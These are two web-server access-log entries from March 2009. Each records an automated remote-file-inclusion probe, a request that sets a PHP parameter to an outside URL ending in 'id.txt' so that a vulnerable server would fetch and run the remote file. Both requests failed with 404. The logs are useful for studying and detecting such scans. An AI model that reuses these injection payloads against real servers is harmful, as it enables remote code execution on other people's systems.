78.111.80.24 - - [24/Mar/2009:05:43:23 -0500] "GET /logs//samplefaqsupport.php?path[docroot]=http://www.sextalkforums.net/forums//tmp/id.txt?%0D?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.45.224.18 - - [24/Mar/2009:05:59:51 -0500] "GET /errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
